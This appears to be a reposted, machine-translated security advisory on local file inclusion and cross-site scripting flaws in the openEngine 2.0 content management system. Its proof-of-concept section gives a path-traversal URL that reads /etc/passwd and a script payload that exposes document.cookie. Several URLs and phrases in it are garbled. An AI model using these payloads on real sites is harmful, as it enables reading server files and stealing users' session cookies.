OpenEngine is a Web content management system developed using PHP. openEngine 2.0 100226 has local inclusion and cross-site scripting vulnerabilities, which may cause sensitive information leakage.
[+] Info:
~~~~~~~~~
OpenEngine 2.0 100226 LFI and XSS Vulnerabilities
Vendor: http://www.openengine.de
Advisory: http://secpod.org/blog? P = 152
Http://secpod.org/advisories/SECPOD_Openengine_LFI_XSS_Vuln.txt
Version: openEngine 2.0 100226; other versions may also be affected.
Download: http://www.openengine.de/download/openengine20_100226.zip
Date: 11/16/2010
[+] Poc:
~~~~~~~~~
* Local file upload Sion,
Http: // localhost/cms/website. php? Template =.../../etc/passwd % 00
* XSS,
Alert (document. cookie) http: // localhost/cms/website. php? Template = <script> alert (document. cookie) </script>
[+] Reference:
~~~~~~~~~
Http://secpod.org/advisories/SECPOD_Openengine_LFI_XSS_Vuln.txt
From: BugZone